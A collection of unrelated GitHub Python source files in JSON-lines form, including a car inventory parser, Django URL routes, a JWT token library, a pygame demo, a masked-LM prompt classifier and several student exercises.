{"seq_id":"22711768866","text":"from car import Car\r\n\r\ntry:\r\n    with open('date.in') as file:\r\n        fullFile = file.read()\r\nexcept FileNotFoundError:\r\n    print(\"File not found\")\r\n\r\nnewFile = fullFile.split()\r\n\r\nnumberOfCars = len(newFile)\r\n\r\nmarca = newFile[0]\r\nmodel = newFile[1]\r\ntoken = newFile[2]\r\npretCumparare = newFile[3]\r\npretVanzare = newFile[4]\r\ncars = [Car(marca, model, token, pretCumparare, pretVanzare)]\r\n\r\nfor i in range(5, numberOfCars, 5):\r\n    marca = newFile[i]\r\n    model = newFile[i + 1]\r\n    token = newFile[i + 2]\r\n    pretCumparare = newFile[i + 3]\r\n    pretVanzare = newFile[i + 4]\r\n    cars.append(Car(marca, model, token, pretCumparare, pretVanzare))\r\n\r\ncars.sort(key = lambda x: (x.marca, x.model, x.token))\r\n\r\n# with open('date.out', 'w') as file:\r\n#     for i in range(0, int(numberOfCars / 5)):\r\n#         file.write(cars[i].marca)\r\n#         file.write(' ')\r\n#         file.write(cars[i].model)\r\n#         file.write(' ')\r\n#         file.write(cars[i].token) \r\n#         file.write(' ')\r\n#         file.write(cars[i].pretCumparare)\r\n#         file.write(' ')\r\n#         file.write(cars[i].pretVanzare)\r\n#         file.write('\\n')\r\n\r\nk = 1\r\nsum = 0\r\n\r\nwith open('date.out', 'w') as file:\r\n    for i in range(0, int(numberOfCars / 5 - 1)):\r\n        if cars[i].marca == cars[i+1].marca:\r\n            k += 1\r\n        else:\r\n            file.write(cars[i].marca)\r\n            file.write(\" \")\r\n            file.write(str(k))\r\n            file.write('\\n')\r\n            sum += k\r\n            k = 1\r\n    file.write(cars[-1].marca)\r\n    file.write(' ')\r\n    file.write(str(int(numberOfCars / 5) - sum))\r\n    file.write('\\n')\r\n\r\n\r\ntry:\r\n    with open('marci.in') as file:\r\n        marciFile = file.read()\r\nexcept FileNotFoundError:\r\n    print(\"File not found\")\r\n\r\nfileMarca = marciFile.split()\r\n\r\nprofit = 0\r\n\r\nfor i in fileMarca:\r\n    for item in cars:\r\n        if item.marca == i:\r\n            profit += int(item.pretVanzare) - int(item.pretCumparare)\r\n    cars = [item for item in cars if item.marca != i]\r\n\r\nnewNumberOfCars = 
len(cars)\r\n\r\nwith open('date.out', 'a') as file:\r\n    for i in range(0, int(newNumberOfCars)):\r\n        file.write(cars[i].marca)\r\n        file.write(' ')\r\n        file.write(cars[i].model)\r\n        file.write(' ')\r\n        file.write(cars[i].token) \r\n        file.write(' ')\r\n        file.write(cars[i].pretCumparare)\r\n        file.write(' ')\r\n        file.write(cars[i].pretVanzare)\r\n        file.write('\\n')\r\n    file.write(str(profit))","repo_name":"IoanAdafinei/AutoPark-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"28595011380","text":"from src.main.lib.pipeline_input_builder import PipelineInputBuilder\nfrom src.main.models.pipeline import Pipeline\nfrom src.main.models.data_type import DataType\nfrom src.main.models.prototype import Prototype\nfrom src.main import db\n\n\nclass PipelineDAO:\n    def __init__(self, params, builder=PipelineInputBuilder):\n        self.payload = None\n        self.pipeline = None\n        self.builder = builder\n        self.data_type = params['data_type']\n        self.name = params['name'].strip()\n        self.prototype = params['prototype']\n        self.description = params.get('description', '').strip()\n\n    def create(self):\n        if self.name == '' or self.name is None:\n            raise KeyError\n\n        data_type = DataType.query.filter_by(slug=self.data_type).first_or_404()\n        prototype = Prototype.query.filter_by(slug=self.prototype).first_or_404()\n\n        self.pipeline = Pipeline(\n            name=self.name,\n            description=self.description,\n            data_type_id=data_type.id,\n            prototype_id=prototype.id,\n        )\n\n        db.session.add(self.pipeline)\n        db.session.commit()\n\n        self.payload = self.builder.call(self.pipeline)\n\n        return self\n\n    def update_by(self, uuid):\n        self.pipeline = Pipeline.query.filter_by(id=uuid).first_or_404()\n        self.pipeline.name = self.name\n        self.pipeline.description = self.description\n        self.pipeline.data_type_id = (\n            DataType.query.filter_by(slug=self.data_type).first_or_404().id\n        )\n        self.pipeline.prototype_id = (\n            Prototype.query.filter_by(slug=self.prototype).first_or_404().id\n        )\n\n        db.session.flush()\n        db.session.commit()\n\n        return self\n","repo_name":"ikennaokpala/flask-restful-api-example","sub_path":"src/main/dao/pipeline_dao.py","file_name":"pipeline_dao.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"41944529047","text":"#!/usr/bin/env python3\r\n\r\n\"\"\"\r\nHandling exceptions: try/except (+else, finally)\r\n\"\"\"\r\n\r\ntry :\r\n    ageUtilisateur = int(input(\"How old are you? 
\"))\r\n assert ageUtilisateur > 18\r\nexcept AssertionError:\r\n print(\"tu es mineur(e) !\")\r\nelse:\r\n print(\"tu as \", ageUtilisateur, \" ans\")\r\nfinally:\r\n exit()","repo_name":"MykouNet/python_1","sub_path":"exemple_try.py","file_name":"exemple_try.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8468060157","text":"#!/usr/bin/python3\n'''This is a module'''\n\n\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n '''A class that inherits from Rectangle class.'''\n def __init__(self, size, x=0, y=0, id=None):\n super().__init__(size, size, x, y, id)\n\n def __str__(self):\n '''A magic method'''\n return ('[Square] ({}) {}/{} - {}'.format(\n self.id, self.x, self.y, self.width))\n\n @property\n def size(self):\n '''A getter function for size'''\n return self.width\n\n @size.setter\n def size(self, value):\n '''A setter function for size'''\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n '''Update method for square'''\n if len(args) != 0:\n try:\n self.id = args[0]\n self.size = args[1]\n self.x = args[2]\n self.y = args[3]\n\n except IndexError:\n pass\n else:\n for key, val in kwargs.items():\n setattr(self, key, val)\n\n def to_dictionary(self):\n '''Returns the dictionary representation of the sqaure'''\n d = {}\n d['id'] = self.id\n d['x'] = self.x\n d['size'] = self.size\n d['y'] = self.y\n\n return d\n","repo_name":"mazi-kunle/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27616502221","text":"from django.urls import path, include, re_path\n\nfrom . 
import views\n\napp_name = 'web'\n\nurlpatterns = [\n    path('', views.home, name='home'),\n    re_path(r'^home_product/$', views.home_products, name='home_products'),\n    re_path(r'^product/$', views.product_view, name='product_view'),\n\n    re_path(r'^add-cart/(?P.*)/(?P.*)/$', views.add_cart, name='add_cart'),\n    re_path(r'^remove-from-cart/(?P.*)/$', views.remove_from_cart, name='remove_from_cart'),\n    re_path(r'^increment-cart/(?P.*)/$', views.increment_cart, name='increment_cart'),\n    re_path(r'^decrement-cart/(?P.*)/$', views.decrement_cart, name='decrement_cart'),\n    re_path(r'^cart/$', views.cart, name='cart'),\n\n    re_path(r'^add-address/$', views.add_address, name='add_address'),\n    re_path(r'^create-order/$', views.create_order, name='create_order'),\n    re_path(r'^payment-gateway/(?P.*)/$', views.payment_gateway, name='payment_gateway'),\n\n    re_path(r'^payment-response/(?P.*)/$', views.payment_response, name=\"payment_response\"),\n    re_path(r'^payments/$',views.payments,name='payments'),\n    re_path(r'^payment/(?P.*)/$',views.payment,name='payment'),\n    re_path(r'^payment-success/(?P.*)/$', views.payment_success, name=\"payment_success\"),\n    re_path(r'^payment-failed/$', views.payment_failed, name=\"payment_failed\"),\n\n    re_path(r'^invoice/(?P.*)/$', views.invoice, name=\"invoice\"),\n\n    path('logout/', views.customer_logout, name='logout'),\n]","repo_name":"Ramshidali/mechion_test_google_auth","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"74184840885","text":"\n\n\"\"\"\nhttps://leetcode-cn.com/problems/fraction-to-recurring-decimal/\n\nGiven the numerator and denominator of a fraction, return the decimal as a string.\n\nIf the fractional part is repeating, enclose the repeating part in parentheses.\n\nIf multiple answers exist, returning any one of them is fine.\n\"\"\"\ndef fractionToDecimal(numerator: int, denominator: int) -> str:\n    \"\"\"\n    Long division: simulate the division and record the remainders. When a remainder repeats, the decimal starts to cycle.\n    \"\"\"\n    if numerator == 0:\n        return \"0\"\n    res = []\n    # record the sign\n    if (numerator > 0 and denominator < 0) or (numerator < 0 and denominator > 0):\n        res.append(\"-\")\n    numerator = abs(numerator)\n    denominator = abs(denominator)\n\n    # record the integer part\n    a = numerator // denominator\n    res.append(str(a))\n    if numerator % denominator != 0:\n        res.append(\".\")\n    # record the fractional part\n    dic = {}\n    numerator %= denominator # first remainder after taking the integer part\n    while numerator != 0 and numerator not in dic:\n        # record the remainder\n        dic[numerator] = len(res)-1\n        # multiply the remainder by 10 and continue dividing\n        numerator *= 10\n        a = numerator // denominator\n        res.append(str(a))\n        numerator %= denominator\n    if numerator != 0:\n        index = dic[numerator]\n        res.insert(index+1, \"(\")\n        res.append(\")\")\n\n    return \"\".join(res)","repo_name":"chenmeng1996/algorithm","sub_path":"特殊技巧/分数到小数.py","file_name":"分数到小数.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"71736460405","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport pandas as pd\nimport json\nimport re\n# re.findall() is used to count Hangul characters\n\n\n\n# to do -> write a function that counts Hangul characters (done) and extract the body with br tags\n# 2 -> from the extracted p-tag or br-tag data, keep only the\n# strings we need and remove the garbage characters\n# 3 -> extract the needed data from the extracted strings\n\ndef countHangul(text):\n    # reads Hangul from the text and counts the matches (using a regex)\n    hanCount=len(re.findall(u'[\\u3130-\\u318F\\uAC00-\\uD7A3]+',text))\n    return hanCount\n\ndef getTextFromLink(url):\n    print(url)\n    html=urllib.request.urlopen(url)\n    soupNews = BeautifulSoup(html,'html.parser')\n    #print(soupNews.prettify())\n    tag_tbody = soupNews.find('tbody')\n\n    
#tag_br=soupNews.select_one(\"br\").parent.get_text().strip()\n\n    tag_p=soupNews.find_all(\"p\")\n    \n    #print(\"\\ntag_p\")\n    #print(tag_p)\n    #print(\"\\ntag_br\")\n    #print(tag_br)\n    return tag_p\n\n# if tag_p split by p tags does not contain more than a certain number of Hangul\n# characters, we can assume it is not the body text, e.g. fewer than 30 Hangul\n# characters -> drop that data, then try extracting the body again with br tags,\n# check the Hangul count once more, and drop it if it still fails\n# confirmed that the same article appears across different news sites,\n# so even if a news body cannot be found with these two conditions, another\n# news site's body covers the same content, so it should not matter\n\n# for br tags we need to extract the value before the br tag... how? (partially done)\n# have not yet found a function in bs4 that supports this\n# if there is none, read the html code from the start, find a br tag -> extract the\n# preceding Hangul string; extracting it this way should work\n\n# first solution -> if it appears in a br tag, go up to its parent tag using .parent\n# and extract the whole text of that element -> seems to work?\n\n\ndef getTextFromBrTag(url):\n    print(url)\n    html=urllib.request.urlopen(url)\n    soupNews = BeautifulSoup(html,'html.parser')\n    #print(soupNews.prettify())\n    tag_tbody = soupNews.find('tbody')\n\n    tag_br=soupNews.select_one(\"br\").parent.get_text().strip()\n\n    #print(\"\\ntag_br\")\n    #print(tag_br)\n    return tag_br\n    \ndef main():\n    with open(\"C:/Users/pilye/Desktop/final_project/수돗물 음용률_naver_news.json\",'r',encoding=\"UTF-8\") as f:\n        json_data = json.load(f)\n    link_data=[]\n    i=0\n    for data in json_data:\n        link_data.append(data['org_link'])\n        print(data)\n        i=i+1\n        if i==15:\n            break\n    print('\\nlinkdata===\\n')\n    print(link_data)\n    result=[]\n    url='https://www.siminilbo.co.kr/news/newsview.php?ncode=1160291781968047'\n    for link in link_data:\n        result_text=[]\n        text_data=getTextFromLink(link)\n        # text_data is a bs4 result object, so converting it to text is tricky\n        for t in text_data:\n            print(t.text)\n            count=countHangul(t.text)\n            print(count)\n            if count>10:\n                result_text.append(t.text)\n            print('\\n')\n        # count the whole text added to result_text again\n        # -> if the whole text is under 50 words, search again with br tags\n        #count = 0\n        #for t in result_text:\n        \n        #count=countHangul(text_data)\n        #print(count)\n        #print('\\n')\n        result.append(result_text)\n        # count all the Hangul in result across the whole text; if it is under 50\n        # or below some threshold, searching again with br tags should work\n\n    print(\"==============++++++++++++++++++++++++++====for re-checking\")\n    for r in result:\n        print(r)\n        print('\\n')\ndef textOut(preData,textResult):\n    # JSON preprocessing needed\n    with open('textOut', 'w', encoding='utf8') as outfile:\n        #jsonFile = json.dumps(jsonResult, indent=4, sort_keys=True, ensure_ascii=False)\n        \n        outfile.write(jsonFile)\nif __name__=='__main__':\n    main()\n","repo_name":"ohpilyeon/pilyeons","sub_path":"이전작업들/주피터사용전시험코드와데이터들/getTextFromNews.py","file_name":"getTextFromNews.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"30117206919","text":"import math\nfrom typing import Generic, Dict, Any, Type, Sequence, Optional, cast\nfrom uuid import uuid4\nimport time\n\nfrom jwt import decode as jwt_decode, encode as jwt_encode, PyJWTError\n\n\nfrom jotbox.types import EncodedToken, StrBytes, TPayload, Payload\nfrom jotbox.json import make_json_encoder\nfrom jotbox.whitelist.base import Whitelist\nfrom jotbox.exceptions import JWTDecodeError, RevokedTokenError\n\n\nclass Jotbox(Generic[TPayload]):\n    whitelist: Optional[Whitelist]\n\n    def __init__(\n        self,\n        *,\n        encode_key: StrBytes,\n        payload_type: Type[TPayload] = cast(Type[TPayload], Payload),\n        decode_key: Optional[StrBytes] = None,\n        encode_algorithm: str = \"HS512\",\n        decode_algorithms: Sequence[str] = (\"HS512\",),\n        leeway: int = 0,\n        expires_in: Optional[int] = None,\n        idle_timeout: Optional[int] = None,\n        whitelist: Optional[Whitelist[TPayload]] = None,\n        jwt_options: Dict[str, bool] = None,\n    ) -> None:\n        if idle_timeout is not None and whitelist is None:\n            raise 
ValueError(\"idle_timeout is not possible without whitelist\")\n self.payload_type = payload_type\n self.encode_key = encode_key\n self.decode_key = decode_key if decode_key is not None else encode_key\n self.encode_algorithm = encode_algorithm\n self.decode_algorithms = decode_algorithms\n self.leeway = leeway\n self.expires_in = expires_in\n self.idle_timeout = idle_timeout\n self.jwt_options = jwt_options\n self.whitelist = whitelist\n\n self.encoded_token_type = EncodedToken[self.payload_type] # type: ignore\n\n def _create_payload_dict(self, **claims) -> Dict[str, Any]:\n iat = math.floor(time.time())\n claims = dict(claims, jti=uuid4(), iat=iat)\n if self.expires_in is not None and \"exp\" not in claims:\n claims[\"exp\"] = claims[\"iat\"] + self.expires_in\n return claims\n\n def create_payload(self, **claims) -> TPayload:\n return self.payload_type(**self._create_payload_dict(**claims))\n\n def _create_until(self, exp: Optional[int]) -> Optional[float]:\n if self.idle_timeout is None:\n return exp + self.leeway if exp is not None else None\n else:\n idle_until = time.time() + self.idle_timeout + self.leeway\n if exp is None:\n return idle_until\n return min(idle_until, exp + self.leeway)\n\n async def add_to_whitelist(self, payload: TPayload) -> None:\n if not self.whitelist:\n return\n until = self._create_until(payload.exp)\n await self.whitelist.add(payload, until)\n\n async def create_token(\n self, _payload: Optional[TPayload] = None, **claims\n ) -> EncodedToken[TPayload]:\n encoded = self.encode_payload(_payload=_payload, **claims)\n await self.add_to_whitelist(encoded.payload)\n return encoded\n\n def encode_payload(\n self, _payload: Optional[TPayload] = None, **claims\n ) -> EncodedToken[TPayload]:\n payload = _payload or self.create_payload(**claims)\n token = jwt_encode(\n payload.dict(exclude_unset=True),\n key=self.encode_key,\n algorithm=self.encode_algorithm,\n json_encoder=make_json_encoder(self.payload_type),\n ).decode()\n return self.encoded_token_type(token=token, payload=payload)\n\n async def verified_payload(self, token: str, **jwt_kwargs) -> TPayload:\n try:\n raw_payload = jwt_decode(\n token,\n key=self.decode_key,\n algorithms=self.decode_algorithms,\n options=self.jwt_options,\n leeway=self.leeway,\n **jwt_kwargs,\n )\n except PyJWTError as e:\n raise JWTDecodeError(\"Failed to decode token\") from e\n payload = self.payload_type(**raw_payload)\n await self._verify_whitelist(payload)\n return payload\n\n async def _verify_whitelist(self, payload: TPayload) -> None:\n if not self.whitelist:\n return\n if self.idle_timeout:\n until = cast(float, self._create_until(payload.exp))\n exists = await self.whitelist.touch(payload, until)\n else:\n exists = await self.whitelist.exists(payload)\n if not exists:\n raise RevokedTokenError(f\"Token ID {payload.jti} has been revoked\")\n\n async def revoke_payload(self, payload: TPayload) -> None:\n if not self.whitelist:\n raise NotImplementedError(\n \"This operation is not supported without whitelist\"\n )\n await self.whitelist.delete(payload)\n","repo_name":"steinitzu/jotbox","sub_path":"jotbox/tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20217237654","text":"# -*- coding: utf-8 -*-\r\n\r\nT = [1, 5, 24, 28, 29, 31, 33, 34, 52]\r\n\r\ndef recherche_dicho(T,v):\r\n '''\r\n T est un tableau trié par ordre croissant\r\n v est la valeur recherchée\r\n '''\r\n n = len(T)\r\n 
+{"seq_id":"20217237654","text":"# -*- coding: utf-8 -*-\r\n\r\nT = [1, 5, 24, 28, 29, 31, 33, 34, 52]\r\n\r\ndef recherche_dicho(T,v):\r\n    '''\r\n    T is an array sorted in ascending order\r\n    v is the value being searched for\r\n    '''\r\n    n = len(T)\r\n    \r\n    mini = 0\r\n    med = 0\r\n    maxi = n-1\r\n    while mini < maxi:\r\n        med = (mini + maxi)//2\r\n        if T[med]< v :\r\n            #v is in the upper part of the array\r\n            mini = med +1\r\n        elif T[med] > v :\r\n            #v is in the lower part of the array\r\n            maxi = med -1\r\n        else :\r\n            maxi = med\r\n            mini = med\r\n    if T[mini]==v :\r\n        indice = mini\r\n    else:\r\n        indice = -1\r\n\r\n    return indice","repo_name":"NaturelEtChaud/NSI-Premiere","sub_path":"17 Dichotomie/Python/algorithme_dichotomie.py","file_name":"algorithme_dichotomie.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"30158041259","text":"import pygame\nimport random\n\n# Initialize the pygame\npygame.init()\n\n# create the screen\nscreen = pygame.display.set_mode((1000, 700))\n\n# Title and Icon\npygame.display.set_caption(\"FirstGame\")\nicon = pygame.image.load('001-leaf.png')\npygame.display.set_icon(icon)\n\n# Player\nplayerImg = pygame.image.load('butterfly.png')\nplayerX = 450\nplayerY = 300\nplayerX_change = 0\nplayerY_change = 0\n\n# Enemy\nenemyImg = pygame.image.load('tree.png')\nenemyX = random.randint(0, 1000)\nenemyY = random.randint(0, 700)\nenemyX_change = 0\nenemyY_change = 0\n\n# Drawing player on the screen\ndef player(x, y):\n    screen.blit(playerImg, (x, y))\n\n\n# Drawing enemy on the screen\ndef enemy(x, y):\n    screen.blit(enemyImg, (x, y))\n\n\n# Game Loop\nrunning = True\nwhile running:\n\n    # RGB = Red, Green, Blue\n    # Fills the background with green\n    screen.fill((0, 128, 0))\n\n#    playerX += 0.2\n\n    for event in pygame.event.get():\n        # Makes able to quit the game\n        if event.type == pygame.QUIT:\n            running = False\n        # if a keystroke is pressed, check whether it's right or left\n        if event.type == pygame.KEYDOWN:\n            # print(\"A keystroke is pressed\")\n            if event.key == pygame.K_LEFT:\n                playerX_change = -0.3\n                # print(\"Left arrow is pressed\")\n            if event.key == pygame.K_RIGHT:\n                playerX_change = 0.3\n                # print(\"Right arrow is pressed\")\n            if event.key == pygame.K_UP:\n                playerY_change = -0.3\n                # print(\"Up arrow is pressed\")\n            if event.key == pygame.K_DOWN:\n                playerY_change = 0.3\n                # print(\"Down arrow is pressed\")\n        if event.type == pygame.KEYUP:\n            if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n                # print(\"Keystroke has been released\")\n                playerX_change = 0\n            if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\n                # print(\"Keystroke has been released\")\n                playerY_change = 0\n\n    playerX += playerX_change\n    playerY += playerY_change\n\n    # Creating X boundaries for a player\n    if playerX <= 0:\n        playerX = 0\n    elif playerX >= 936:\n        playerX = 936\n\n    # Creating Y boundaries for a player\n    if playerY <= 0:\n        playerY = 0\n    elif playerY >= 636:\n        playerY = 636\n\n    player(playerX, playerY)\n    enemy(enemyX, enemyY)\n    pygame.display.update()\n","repo_name":"EdvinsVormsbehers/EDIBO_5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
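recherche_dicho above is the classic dichotomic (binary) search, kept at O(log n) by halving the [mini, maxi] window. A quick cross-check of its contract (index on hit, -1 on miss) against the standard library's bisect, assuming the function is importable in scope:

import bisect

T = [1, 5, 24, 28, 29, 31, 33, 34, 52]
for v in range(60):
    i = bisect.bisect_left(T, v)
    expected = i if i < len(T) and T[i] == v else -1
    assert recherche_dicho(T, v) == expected, (v, expected)
print("recherche_dicho agrees with bisect over", len(T), "elements")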
+{"seq_id":"19996708832","text":"import json\nimport logging\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom transformers import AutoModelForMaskedLM\nfrom transformers import AutoTokenizer\n\nfrom configs.arguments import TrainingArguments\n\n\nclass PromptModel(nn.Module):\n    def __init__(self, config: TrainingArguments):\n        super(PromptModel, self).__init__()\n        self.config = config\n        self.bert = AutoModelForMaskedLM.from_pretrained(config.model_name)\n        self.tokenizer = AutoTokenizer.from_pretrained(self.config.model_name)\n\n        self.vocabs = json.load(open(os.path.join(self.config.model_name, \"tokenizer.json\"), \"r\", encoding=\"utf-8\"))\n\n        self.prompt_positives = config.prompt_positive\n        self.prompt_negatives = config.prompt_negative\n        self.prompt_positives_indexes = self._get_index(self.prompt_positives)\n        self.prompt_negatives_indexes = self._get_index(self.prompt_negatives)\n        assert len(self.prompt_negatives) == len(self.prompt_positives)\n        logging.info(f\"[MASK]: {self.tokenizer.encode('[MASK]', add_special_tokens=False)},\"\n                     f\" <mask>: {self.tokenizer.encode('<mask>', add_special_tokens=False)}\")\n        logging.info(f\"Prompt: + {self.prompt_positives_indexes} - {self.prompt_negatives_indexes}\")\n\n    def _get_index(self, s):\n        # result = [self.vocabs[\"model\"][\"vocab\"][ch] for ch in s]\n        if \"xlm-roberta\" in self.config.model_name:\n            result = []\n            for ch in s:\n                sub_result = self.tokenizer.encode(ch, add_special_tokens=False)\n                if sub_result[0] == 6 and len(sub_result) == 2:\n                    result.append(sub_result[1])\n                else:\n                    # ?!\n                    sub_result = self.tokenizer.encode(\"测\" + ch, add_special_tokens=False)\n                    assert sub_result[0] == 6 and len(sub_result) == 3, sub_result\n                    result.append(sub_result[2])\n        else:\n            result = [self.tokenizer.encode(ch, add_special_tokens=False)[0] for ch in s]\n        return result\n\n    def forward(self, x1, x2):\n        # b * 512, b * 512, b\n        context_text, mask_text, prompt_pos = x1[0], x1[2], x1[3]\n        predict = self.bert(context_text, attention_mask=mask_text)[0] # b, max_len, vocab_size\n        positive_result, negative_result = [], []\n        for i in range(self.config.batch_size):\n            positive_result.append(predict[i][prompt_pos[i]][self.prompt_positives_indexes])\n            negative_result.append(predict[i][prompt_pos[i]][self.prompt_negatives_indexes])\n        # b * len(prompt_positive)\n        pos_tensor, neg_tensor = torch.stack(positive_result), torch.stack(negative_result)\n        return neg_tensor, pos_tensor\n","repo_name":"PotassiumWings/Negative-financial-information-determination","sub_path":"models/prompt_model.py","file_name":"prompt_model.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
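PromptModel reads the masked-LM logits at the prompt's [MASK] position and compares them over hand-picked positive/negative verbalizer tokens. The same idea in miniature with a generic Hugging Face checkpoint — the model name and the good/bad verbalizers are placeholders, not the repo's configuration:

import torch
from transformers import AutoModelForMaskedLM, AutoTokenizer

name = "bert-base-uncased"  # placeholder checkpoint
tok = AutoTokenizer.from_pretrained(name)
mlm = AutoModelForMaskedLM.from_pretrained(name)

text = f"the quarterly report was solid . overall it was {tok.mask_token} ."
enc = tok(text, return_tensors="pt")
mask_pos = (enc.input_ids[0] == tok.mask_token_id).nonzero().item()

with torch.no_grad():
    logits = mlm(**enc).logits[0, mask_pos]  # vocab-sized scores at the mask

pos_id = tok.convert_tokens_to_ids("good")  # placeholder verbalizers
neg_id = tok.convert_tokens_to_ids("bad")
print("positive" if logits[pos_id] > logits[neg_id] else "negative")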
+{"seq_id":"30555604426","text":"import os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sys\r\n\r\nclass XlsLoading ( object ):\r\n# Loading the xls file\r\n\r\n# Constructor\r\n    def __init__ ( self):\r\n        self.namefile = \"\"\r\n        self.pandasxls = \"\"\r\n        self.namesheetselectionned = \"\"\r\n        self.yoursheet = \"\"\r\n        self.xls_file = \"\"\r\n        self.id = \"\"\r\n        self.r = \"\"\r\n        self.f = \"\"\r\n        self.m = \"\"\r\n        \r\n# End of constructor\r\n    \r\n# Loading xls file \r\n    def LoadingXlsFile ( self ):\r\n        while True:\r\n            self.namefile = input(\"Name of the xls file to load (don't forget the extension) :\")\r\n            if os.path.isfile (self.namefile):\r\n                print ( \"the file has been loaded\" )\r\n                self.pandasxls = pd.ExcelFile(self.namefile)\r\n                break\r\n            else:\r\n                print ( \"the file doesn't exist\" )\r\n                continue\r\n    # End of Loading xls file and transforming it into a pandas dataframe \r\n\r\n# Select the good sheet\r\n    def XlsSelectTheGoodSheet (self) :\r\n        xls_file = pd.ExcelFile(self.namefile)\r\n        self.sheets = xls_file.sheet_names\r\n        print (\"These are the worksheets in this document\",self.sheets)\r\n        while True :\r\n            self.yoursheet = input(\"Please, select your worksheet : \")\r\n            if self.yoursheet in self.sheets:\r\n                print (\"Your worksheet has been loaded\")\r\n                self.customersdf = xls_file.parse(self.yoursheet) # defined as the principal pandas dataframe\r\n                print (self.customersdf)\r\n                break\r\n            else:\r\n                print(\"this worksheet doesn't exist\")\r\n                continue\r\n# End Select the good sheet\r\n    \r\n# Select the features for clustering \r\n    def SelectFeaturesForClustering(self):\r\n        print (\"---------------------------------------------------------------------------\")\r\n        print (\"It's time to select your features for clustering, look at the list at the top\")\r\n        print (\"---------------------------------------------------------------------------\")\r\n        self.id = input(\"Please type the name of the customer id feature : \")\r\n        self.r = input(\"Please type the name of the recency feature : \")\r\n        self.f = input(\"Please type the name of the frequency feature : \")\r\n        self.m = input(\"Please type the name of the monetary feature : \")\r\n        \r\n# End Select the features for clustering \r\n\r\n\r\n","repo_name":"lotito/RFM_CLUSTERING_PROD","sub_path":"LoadingFile.py","file_name":"LoadingFile.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"38986879429","text":"def Promedio_Notas(codigo1: str, Exa1: float, nota1: float, codigo2: str, Exa2: float, nota2: float, codigo3: str, Exa3:float, nota3 : float) -> str :\n    if codigo1 == \"111\":\n        mat = (Exa1 * 0.9) + (nota1 * 0.1)\n    else:\n        #mensaje=\"CODIGO DE MATEMATICA NO EXISTE\"\n        print(\"CODIGO MATEMATICA NO EXISTE\")\n        mat = 0\n        #return mensaje\n    if codigo2 == \"222\":\n        fis = (Exa2 * 0.8) + (nota2 * 0.2)\n    else:\n        #mensaje = \"CODIGO DE FISICA NO EXISTE\"\n        print(\"CODIGO FISICA NO EXISTE\")\n        fis = 0\n        #return mensaje\n    if codigo3 == \"333\":\n        qui = (Exa3 * 0.85) + (nota3 * 0.15)\n    else:\n        #mensaje=\"CODIGO DE QUIMICA NO EXISTE\"\n        print(\"CODIGO QUÍMICA NO EXISTE\")\n        qui = 0\n        #return mensaje\n    #print(mat,fis,qui)\n    promedio=(mat+fis+qui)/3\n    promTotal = round(promedio, 2)\n    if promTotal >= 3.0:\n        mensaje= f\"Paso el promedio con {promTotal}\"\n    else:\n        mensaje= f\"No paso el promedio con {promTotal}\"\n\n    return mensaje\n    #f\"El promedio Total ajustado del estudiante es: {promTotal}\"\n\ncodigo1 = str(input(\"Ingrese codigo de matematicas: \"))\ncodigo2 = str(input(\"Ingrese codigo de Fisica: \"))\ncodigo3 = str(input(\"Ingrese codigo de Quimica: \"))\nExa1=float(input(\"Ingrese nota de examen de matematicas: \"))\nnota1=float(input(\"Ingrese nota de trabajos de matematicas: \"))\nExa2=float(input(\"Ingrese nota de examen de FISICA: \"))\nnota2=float(input(\"Ingrese nota de trabajos de FISICA: \"))\nExa3=float(input(\"Ingrese nota de examen de QUÍMICA: \"))\nnota3=float(input(\"Ingrese nota de trabajos de QUÍMICA: \"))\nprint(Promedio_Notas(codigo1,Exa1,nota1,codigo2,Exa2,nota2,codigo3,Exa3,nota3))","repo_name":"ClaudiaMoraC/Ciclo1_Python","sub_path":"RetoSemana2.py","file_name":"RetoSemana2.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
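Promedio_Notas blends exam and coursework marks with per-subject weights (90/10 for maths, 80/20 for physics, 85/15 for chemistry) and passes at an average of 3.0. A worked check of that arithmetic, assuming the 0-to-5 grading scale the pass mark implies:

mat = 4.0 * 0.9 + 2.0 * 0.1    # 3.8
fis = 3.0 * 0.8 + 5.0 * 0.2    # 3.4
qui = 2.0 * 0.85 + 4.0 * 0.15  # 2.3
prom_total = round((mat + fis + qui) / 3, 2)
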